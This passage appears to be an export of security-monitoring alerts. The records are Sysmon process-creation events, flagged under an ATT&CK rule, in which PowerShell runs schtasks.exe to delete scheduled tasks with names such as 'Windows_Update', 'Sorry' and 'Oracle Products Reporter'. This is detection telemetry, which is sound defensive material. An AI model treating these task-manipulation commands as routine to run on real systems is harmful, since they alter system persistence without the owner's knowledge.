/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.542243400Z"",""eventRecordID"":""3942"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.537\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001041243100}\r\nProcessId: 6840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.537"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001041243100}"",""processId"":""6840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.326",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.452 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001096223100} +ProcessId: 7288 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.480772700Z"",""eventRecordID"":""3941"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.452\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001096223100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.452"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001096223100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.316",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.402 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010be1f3100} +ProcessId: 2712 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.408938200Z"",""eventRecordID"":""3940"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.402\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010be1f3100}\r\nProcessId: 2712\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.402"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010be1f3100}"",""processId"":""2712"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.299",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.369 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010921d3100} +ProcessId: 7780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.372537100Z"",""eventRecordID"":""3939"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.369\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010921d3100}\r\nProcessId: 7780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.369"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010921d3100}"",""processId"":""7780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.285",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.340 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010d51b3100} +ProcessId: 4744 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.344709400Z"",""eventRecordID"":""3938"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.340\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010d51b3100}\r\nProcessId: 4744\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.340"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010d51b3100}"",""processId"":""4744"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.252",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.306 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001055193100} +ProcessId: 944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.313255500Z"",""eventRecordID"":""3937"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.306\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001055193100}\r\nProcessId: 944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.306"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001055193100}"",""processId"":""944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.237",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.197 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001024173100} +ProcessId: 5168 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.208645900Z"",""eventRecordID"":""3936"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.197\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001024173100}\r\nProcessId: 5168\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 